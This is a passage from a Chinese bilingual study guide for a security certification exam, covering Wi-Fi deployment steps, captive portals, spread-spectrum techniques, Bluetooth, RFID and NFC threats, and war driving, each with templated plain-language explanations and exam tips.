一端封闭的管子构成。 面板天线是扁平设备,仅从面板的一侧进行聚焦。 抛物 面天线用于聚焦来自极远距离或微弱信号源的信号。 在寻求最佳天线位置时,请考虑以下指南: 使用中心位置。 避免固体物理障碍物。 避免反射性或其他平面金属表面。 避免电气设备。 如果基站配备外部全向天线,通常应将其垂直向上放置。 如果使用定向天线, 请将焦点对准所需使用的区域。 请注意,无线信号会受到干扰、距离和障碍物 的影响。 一些无线接入点(WAP)提供天线功率级别的物理或逻辑调整。 功率级别控 制通常由制造商设置为适合大多数情况的默认值。 在完成现场勘测后,如果无 线信号仍不理想,可能需要调整功率级别。 然而,更改信道、避免反射和信号 散射表面以及减少干扰,通常对提高连接可靠性更为重要。 调整功率级别时,应进行小幅调整,而非试图将设置最大化或最小化。 同时, 请记录初始/默认设置,以便在需要时恢复。 每次调整功率级别后,在重新进行 现场勘测和质量测试之前,请重置/重启WAP。 有时,降低功率级别反而能提 升性能。 某些WAP能够提供高于其销售国家法规允许的功率级别。

使用强制门户 一个 强制门户 是一种身份验证技术,它将新连接的客户端重定向到基于网页的 门户访问控制页面。 该门户页面可能要求用户输入支付信息、提供登录凭证或 输入访问码。 强制门户还用于向用户显示可接受使用政策、隐私政策和跟踪政 策,用户必须同意这些政策后才能在网络中进行通信。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

政策:政策是高层原则,说明必须遵守什么。

指南:指南是建议做法,不一定强制。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Policy 高层、强制、稳定;Procedure 具体步骤。

Recommended、not compulsory 常对应 guideline。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
政策 政策是高层原则,说明必须遵守什么。
指南 指南是建议做法,不一定强制。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 59 / PDF P777

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Captive portals are most often located on wireless networks implemented for public use, such as at hotels, restaurants, bars, airports, libraries, and so on. However, they can be used on cabled Ethernet connections as well. Captive portals can be used in any scenario where the owner or administrator of a connection wants to limit access to authorized entities (which might include paying customers, overnight guests, known visitors, or those who agree to a security policy and/or terms of service). General Wi-Fi Security Procedure Here is a general guide or procedure to follow when deploying a Wi-Fi network. These steps are in order of consideration and application/installation: 1.

Update firmware. 2. Change the default administrator password to something unique and complex. 3. Enable WPA2 or WPA3 encryption. 4. Enable ENT authentication or PSK/SAE with long, complex passwords. 5. Change the SSID (the default is often the vendor name). 6. Change the wireless MAC address (to hide OUI and device make/model that may be encoded into the default MAC address). 7. Decide whether to disable the SSID broadcast based on your deployment requirements (even though this doesn't increase security). 8. Enable MAC filtering if the pool of wireless clients is relatively small (usually less than 20) and static. 9.

Consider using static IP addresses or configure DHCP with reservations (applicable only for small deployments). 10. Treat wireless as external or remote access, and separate the WAP from the wired network using a firewall. 11. Treat wireless as an entry point for attackers and monitor all WAP-towired-network communications with an NIDS. 12. Deploy a wireless intrusion detection system (WIDS) and a wireless intrusion prevention system (WIPS). 13. Consider requiring the use of a VPN across a Wi-Fi link.

中文直译 / 整理

强制门户最常位于为公共使用而设置的无线网络上,例如在酒店、餐厅、酒吧、 机场、图书馆等场所。 然而,它们也可用于有线以太网连接。 在任何连接的所 有者或管理员希望限制访问权限仅限于授权实体(可能包括付费客户、过夜客 人、已知访客,或同意安全策略和/或服务条款的用户)的场景中,都可以使用 强制门户。 通用Wi‑Fi安全流程 以下是部署Wi‑Fi网络时应遵循的一般指南或步骤。 这些步骤按考虑和 应用/安装的顺序排列: 1. 更新固件。 2. 将默认管理员密码更改为唯一且复杂的密码。 3. 启用WPA2或WPA3加密。 4. 启用ENT认证或使用长而复杂的密码的PSK/SAE。 5. 更改SSID(默认值通常是厂商名称)。 6. 更改无线MAC地址(以隐藏可能编码在默认MAC地址中的OUI和设备制造 商/型号)。 7. 根据您的部署需求决定是否禁用SSID广播(尽管这并不能提高安全性)。 8. 如果无线客户端池相对较小(通常少于20个)且静态,则启用MAC过滤。 9. 考虑使用静态IP地址,或配置带有保留的DHCP(仅适用于小型部署)。 10. 将无线网络视为外部或远程访问,并使用防火墙将WAP与有线网络分离。

11. 将无线网络视为攻击者的入口点,并使用NIDS监控所有WAP到有线网络的通信。 12. 部署无线入侵检测系统(WIDS)和无线入侵防御系统(WIPS)。 13. 考虑要求通过Wi‑Fi链路使用VPN。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 60 / PDF P778

第 778 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

14. Implement a captive portal. 15. Track/log all wireless activities and events. Wireless Communications Wireless communication is a quickly expanding field of technologies for networking, connectivity, communication, and data exchange. As wireless technologies continue to proliferate, your organization's security efforts need to encompass wireless communications. General Wireless Concepts Wireless communications employ radio waves to transmit signals over a distance. The radio spectrum is differentiated using frequency. Frequency is a measurement of the number of wave oscillations within a specific time and is identified using the unit Hertz (Hz) (i.e., oscillations per second).

Radio waves have a frequency between 3 Hz and 300 GHz. Several spectrum-use techniques were developed to manage the simultaneous use of the limited radio frequencies, including spread spectrum, FHSS, DSSS, OFDM, MIMO, TDMA, and CDMA. Most devices operate within a small subsection of frequencies rather than all available frequencies. This is because of frequency-use regulations (in other words, the FCC in the United States), power consumption, and the expectation of interference. Spread spectrum means that communication occurs over multiple frequencies. Thus, a message is broken into pieces, and each piece is sent at the same time but using a different frequency.

Effectively, this is a parallel communication rather than a serial communication. Frequency Hopping Spread Spectrum (FHSS) was an early implementation of the spread spectrum concept. FHSS transmits data in series across a range of frequencies, but only one frequency at a time is used. Direct Sequence Spread Spectrum (DSSS) employs frequencies simultaneously in parallel. DSSS uses a special encoding mechanism known as chipping code to allow a receiver to reconstruct data even if parts of the signal were distorted because of interference. 14.

中文直译 / 整理

实施强制门户。 15. 跟踪/记录所有无线活动和事件。 无线通信 无线通信是网络、连接、通信和数据交换领域中迅速扩展的技术。 随着无线技 术的不断普及,您的组织安全工作必须涵盖无线通信。 通用无线概念 无线通信利用无线电波在一定距离内传输信号。 无线电频谱通过频率进行区分。 频率是特定时间内波振荡次数的度量,使用单位赫兹(Hz)(即每秒振荡次数) 表示。 无线电波的频率范围在3 Hz至300 GHz之间。 为管理有限无线电频率的 同时使用,开发了多种频谱使用技术,包括扩频、FHSS、DSSS、OFDM、 MIMO、TDMA和CDMA。 大多数设备仅在一小部分频率范围内运行,而非使用所有可用频率。 这是由于频率使用法规(例如美国的FCC)、功耗以及对干扰的预期所致。 扩频意味着通信在多个频率上进行。 因此,消息被分解为多个部分,每个部 分同时发送,但使用不同的频率。 实际上,这是一种并行通信,而非串行通 信。 跳频扩频(FHSS)是扩频概念的早期实现。 FHSS在一系列频率上依次传输数 据,但每次仅使用一个频率。 直接序列扩频(DSSS)同时并行使用频率。

DSSS使用一种称为扩频码的特殊 编码机制,使接收器即使在信号因干扰而部分失真的情况下也能重建数据。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 778 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 61 / PDF P779

第 779 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Orthogonal Frequency-Division Multiplexing (OFDM) employs a digital multicarrier modulation scheme that allows for a more tightly compacted transmission. The modulated signals are perpendicular (orthogonal) and thus do not cause interference with one another. Ultimately, OFDM requires a smaller frequency set (aka channel bands) but can offer greater data throughput. Multiple Input, Multiple Output (MIMO) is a wireless communication technology that uses multiple antennas at both the transmitter and receiver ends to improve the performance of a communication link. MIMO is widely used in modern wireless communication systems to enhance data rates, reliability, and overall spectral efficiency.

Time Division Multiple Access (TDMA) is a digital communication technology used in various wireless communication systems, including mobile and satellite communication. TDMA is a multiple access scheme that divides the available communication channel into time slots, allowing multiple users to share the same frequency without interfering with each other. Code Division Multiple Access (CDMA) is a digital cellular technology that allows multiple users to share the same frequency band simultaneously. CDMA assigns a unique code to each entity. This unique code allows multiple signals to occupy the same frequency at the same time.

Bluetooth Bluetooth was originally defined in IEEE 802.15.1 but is currently managed by Bluetooth SIG (www.bluetooth.com). The Bluetooth SIG (special interest group) is an industry association that oversees the development and standardization of Bluetooth technology. The Bluetooth SIG is responsible for defining the specifications, promoting interoperability, and certifying Bluetooth products. Bluetooth is a wireless communication technology that allows devices to exchange data over short distances using radio waves. It uses the 2.4 GHz frequency. Bluetooth is plaintext by default in most implementations, but it can be encrypted with specialty transmitters and peripherals.

Bluetooth operates between devices that have been paired, which often use a default pair code, such as 0000 or 1234. Bluetooth is generally a short-distance communication method (used to create personal area networks [PANs]), but that distance is based on the relative strengths of the paired devices'

中文直译 / 整理

正交频分复用(OFDM)采用一种数字多载波调制方案,可实现更紧密的传输。 调制信号相互垂直(正交),因此不会彼此干扰。 最终,OFDM所需的频率集 合(即信道频段)更小,但可提供更高的数据吞吐量。 多输入多输出(MIMO)是一种无线通信技术,通过在发射端和接收端使用 多个天线来提升通信链路的性能。 MIMO广泛应用于现代无线通信系统中, 以提高数据速率、可靠性和整体频谱效率。 时分多址(TDMA)是一种数字通信技术,用于各种无线通信系统,包括移动 通信和卫星通信。 TDMA是一种多址接入方案,将可用通信信道划分为时隙, 使多个用户能够在不相互干扰的情况下共享同一频率。 码分多址(CDMA)是一种数字蜂窝技术,允许多个用户同时共享同一频段。 CDMA为每个实体分配一个唯一编码,该唯一编码使多个信号能够同时占用同 一频率。 蓝牙 蓝牙最初由IEEE 802.15.1定义,但目前由蓝牙SIG(www.bluetooth.com)管理。 蓝牙SIG(特别兴趣小组)是一个行业组织,负责蓝牙技术的开发与标准化。 蓝 牙SIG负责制定规范、促进互操作性并认证蓝牙产品。 蓝牙是一种无线通信技术,允许设备通过无线电波在短距离内交换数据。

它使 用2.4 GHz频率。 在大多数实现中,蓝牙默认为明文传输,但可以通过专用发 射器和外设进行加密。 蓝牙在已配对的设备之间运行,这些设备通常使用默认 配对码,例如0000或1234。 蓝牙通常是一种短距离通信方式(用于创建个人 区域网络 [PANs]),但该距离取决于已配对设备的相对功率'

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 779 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 62 / PDF P780

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

antennas. Standard or official use of Bluetooth ranges up to 100 meters, and an estimated 350+ meters with the introduction of Bluetooth 5. Bluetooth Low Energy (Bluetooth LE, BLE, Bluetooth Smart) is a low-powerconsumption derivative of standard Bluetooth. BLE was designed for IoT, edge/fog devices, mobile equipment, medical devices, and fitness trackers. It uses less power while maintaining a similar transmission range to that of standard Bluetooth. Standard Bluetooth and BLE are not compatible, but they can coexist on the same device. iBeacon is a location-tracking technology developed by Apple based on BLE.

iBeacon can be used by a store to track customers while they shop as well as by customers as an indoor positioning system to navigate to an interior location. Zigbee is an IoT equipment communications concept that is based on Bluetooth. Zigbee has low power consumption and a low throughput rate, and requires close proximity of devices. Zigbee communications are encrypted using a 128-bit symmetric algorithm. Bluetooth is vulnerable to a wide range of attacks: Bluesniffing is Bluetooth-focused network packet capturing. Bluesmacking is a DoS attack against a Bluetooth device that can be accomplished through the transmission of garbage traffic or signal jamming.

Bluejacking involves sending unsolicited messages to Bluetooth-capable devices without the permission of the owner/user. These messages may appear on a device's screen automatically, but many modern devices prompt whether to display or discard such messages. BLUFFS (Bluetooth Forward and Future Secrecy) is a series of exploits targeting Bluetooth, aiming to break Bluetooth sessions' forward and future secrecy, compromising the confidentiality of past and future communications between devices. Bluesnarfing is the unauthorized access of data via a Bluetooth connection. Sometimes, the term bluejacking is mistakenly used to describe or label the activity of bluesnarfing.

Bluesnarfing typically occurs over a paired link between the threat actor's system and the target device. However, bluesnarfing is also possible against non-discoverable

中文直译 / 整理

天线。 标准或官方蓝牙使用范围可达100米,随着蓝牙5的推出,预计可达 350+ 米。 低功耗蓝牙(BluetoothLowEnergy,BluetoothLE,BLE,Bluetooth Smart)是标准蓝牙的低功耗衍生版本。 BLE专为物联网、边缘/雾设备、移动 设备、医疗设备和健身追踪器设计。 它在保持与标准蓝牙相似传输范围的同时, 消耗更少的电力。 标准蓝牙和BLE不兼容,但可以在同一设备上共存。 iBeacon是苹果公司基于BLE开发的一种定位跟踪技术。 商店可以使用 iBeacon来追踪顾客购物时的位置,顾客也可以将其用作室内定位系统,以导 航至室内特定位置。 Zigbee是一种基于蓝牙的物联网设备通信概念。 Zigbee具有低功耗和低吞吐率 的特点,并要求设备之间保持近距离。 Zigbee通信采用128位对称算法进行加密。 蓝牙容易受到多种攻击: Bluesniffing是专注于蓝牙的网络数据包捕获。 Bluesmacking是一种针对蓝牙设备的拒绝服务(DoS)攻击,可通过 发送垃圾流量或信号干扰来实现。

Bluejacking 指在未经所有者/用户许可的情况下,向支持蓝牙的设备发送 未经请求的消息。 这些消息可能会自动显示在设备屏幕上,但许多现代设 备会提示用户是否显示或丢弃此类消息。 BLUFFS (Bluetooth Forward and Future Secrecy) 是一系列针对蓝牙的 攻击,旨在破坏蓝牙会话的前向机密性和未来机密性,从而危及设备间 过去和未来通信的机密性。 Bluesnarfing 是通过蓝牙连接未经授权访问数据的行为。 有时,术语 bluejacking 会被错误地用来描述或标记 bluesnarfing 活动。 Bluesnarfing 通常发生在攻击者的系统与目标设备之间的配对链接上。 然而,即使目标设备 不可发现,只要其蓝牙 MAC 地址已知,也有可能进行 bluesnarfing

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 63 / PDF P781

第 781 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

devices if their Bluetooth MAC addresses are known, which could be gathered using bluesniffing. Bluebugging grants an attacker remote control over the hardware and software of your devices over a Bluetooth connection. The name is derived from enabling the microphone on a compromised system to use it as a remote wireless bug. All Bluetooth devices are vulnerable to bluesniffing, bluesmacking, bluejacking, and BLUFF attacks. Only a few devices have been discovered to be vulnerable to bluesnarfing or bluebugging. The defenses for all of these Bluetooth threats are to minimize use of Bluetooth, especially in public locations, and to leave Bluetooth turned off completely when not in active use.

RFID Radio Frequency Identification (RFID) is a tracking technology based on the ability to power a radio transmitter using current generated in an antenna (see Figure 11.7) when placed in a magnetic field. RFID can be triggered/powered and read from a considerable distance away (potentially hundreds of meters). RFID can be attached to devices and components or integrated into their structure. This can allow for quick inventory tracking without having to be in direct physical proximity to the device. Simply walking into a room with an RFID reader, a malicious actor can collect the information transmitted by the activated chips in the area.

中文直译 / 整理

设备,这些地址可能通过 bluesniffing 获取。 Bluebugging使攻击者能够通过蓝牙连接远程控制您的设备的硬件和 软件。 该名称源于在被入侵的系统上启用麦克风,将其用作远程无线窃听 器。 所有蓝牙设备都容易受到bluesniffing、bluesmacking、bluejacking和 BLUFF攻击。 只有少数设备被发现易受bluesnarfing或bluebugging攻击。 防御所有这些蓝牙威胁的方法是尽量减少蓝牙的使用,尤其是在公共场合, 并在不使用时完全关闭蓝牙。 RFID 射频识别(RFID)是一种基于天线在磁场中产生电流以给无线电发射器供电 的追踪技术(见图11.7)。 RFID可以在相当远的距离外被触发/供电并读取 (可能达数百米)。 RFID可以附着在设备和组件上,或集成到其结构中。 这 使得无需与设备直接物理接触即可快速进行库存追踪。 只需带着RFID读取器 走进一间房间,恶意攻击者便可收集该区域内被激活芯片所传输的信息。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 781 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

IPS 放在线路中,误报可能影响可用性。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 64 / PDF P782

第 782 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 11.7 An RFID antenna Adapted from http://electrosome.com/rfid-radio-frequency-identification There is some concern that RFID can be a privacy-violating technology. If you are in possession of a device with an RFID chip, then anyone with an RFID reader can take note of the signal from your chip. When an RFID chip is awakened or responds to being near a reader, the chip (also called the RFID tag) transmits a unique code or serial number. That unique number is meaningless without the corresponding database that associates the number with the specific object (or person).

However, if you are the only one around and someone detects your RFID chip code, then they can associate you and/or your device with that code for all future detections of the same code. NFC Near-field communication (NFC) is a standard that establishes radio communications between devices in close proximity (4 centimeters or less versus meters for passive RFID). It lets you perform a type of automatic

中文直译 / 整理

图11.7 一个RFID天线 改编自 http://electrosome.com/rfid‑radio‑frequency‑identification 有人担心RFID可能是一种侵犯隐私的技术。 如果您拥有的设备带有RFID芯片, 那么任何拥有RFID读取器的人都能捕捉到您芯片发出的信号。 当RFID芯片被 唤醒或对靠近读取器做出响应时,该芯片(也称为RFID标签)会传输一个唯一 的代码或序列号。 如果没有与该编号关联特定对象(或人员)的对应数据库, 这个唯一编号本身并无意义。 然而,如果您是周围唯一的人,而有人检测到了 您的RFID芯片代码,那么他们就可以将您和/或您的设备与该代码关联起来, 并在将来每次检测到相同代码时继续追踪。 NFC 近场通信(NFC)是一种标准,用于在近距离(4厘米或更短,而无源 RFID为米级)的设备之间建立无线电通信。 它使您能够执行一种自动

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 782 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
标准 标准给出必须满足的最低要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 65 / PDF P783

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

synchronization and association between devices by touching them together or bringing them within centimeters of one another. NFC can be implemented as a field-powered or field-triggered device. NFC is a derivative technology from RFID and is a form of field-powered or manually triggered device. NFC is commonly found on smartphones and many mobile device accessories. It's often used to perform device-to-device data exchanges, set up direct communications, or access more complex services such as WPA2/WPA3 wireless networks by linking with the WAP via NFC. Many contactless payment systems are based on NFC.

NFC can function just like RFID (such as when using an NFC tile or sticker) or support more complex interactions. NFC chips can support challenge-response dialogs and even use public key infrastructure (PKI) encryption solutions. NFC attacks can include AitM attacks, eavesdropping, data manipulation, and replay attacks. So, while some NFC implementations support reliable authentication and encryption, not all of them do. A best practice is to leave NFC features disabled until they need to be used. Wireless Attacks Wireless networking has become common on both corporate and home networks. Even with wireless security present, wireless attacks can still occur.

Wi-Fi Scanners War driving is someone using a detection tool to look for wireless networking signals, often ones they aren't authorized to access. The name comes from the legacy attack concept of war dialing, which was used to discover active computer modems by dialing all the numbers in a prefix or an area code. War driving can be performed with a dedicated handheld detector, with a mobile device with Wi-Fi capabilities, with a notebook that has a wireless network card, or even with a drone (war flying). It can be performed using native features of the OS or using specialized scanning and detecting tools (aka wireless scanners).

A wireless scanner is used to detect the presence of a wireless network. Any active wireless network that is not enclosed in a Faraday cage can be detected, since the base station will be transmitting radio waves, even those with SSID broadcast disabled.

中文直译 / 整理

同步和设备间的关联,只需将它们相互触碰或使它们彼此靠近几厘米即可。 NFC可以实现为场供电或场触发设备。 NFC是RFID的衍生技术,也是一种场 供电或手动触发设备的形式。 NFC 常见于智能手机和许多移动设备配件中。 它通常用于执行设备间的数据交 换、建立直接通信,或通过与 WAP 通过 NFC 连接来访问更复杂的服务,例如 WPA2/WPA3 无线网络。 许多非接触式支付系统都基于 NFC。 NFC 可以像 RFID 一样工作(例如使用 NFC 磁贴或贴纸),也可以支持更复杂的交互。 NFC 芯片可以支持挑战‑响应对话,甚至使用公钥基础设施(PKI)加密解决方 案。 NFC 攻击可能包括中间人攻击、窃听、数据篡改和重放攻击。 因此,尽管某些 NFC 实现支持可靠的认证和加密,但并非所有实现都如此。 最佳实践是直到需 要使用时才启用 NFC 功能。 无线攻击 无线网络在企业网络和家庭网络中都已变得普遍。 即使存在无线安全措施,无线攻 击仍可能发生。 Wi‑Fi 扫描工具 战争驾驶 是指有人使用检测工具寻找无线网络信号,通常是那些未经授权 访问的信号。

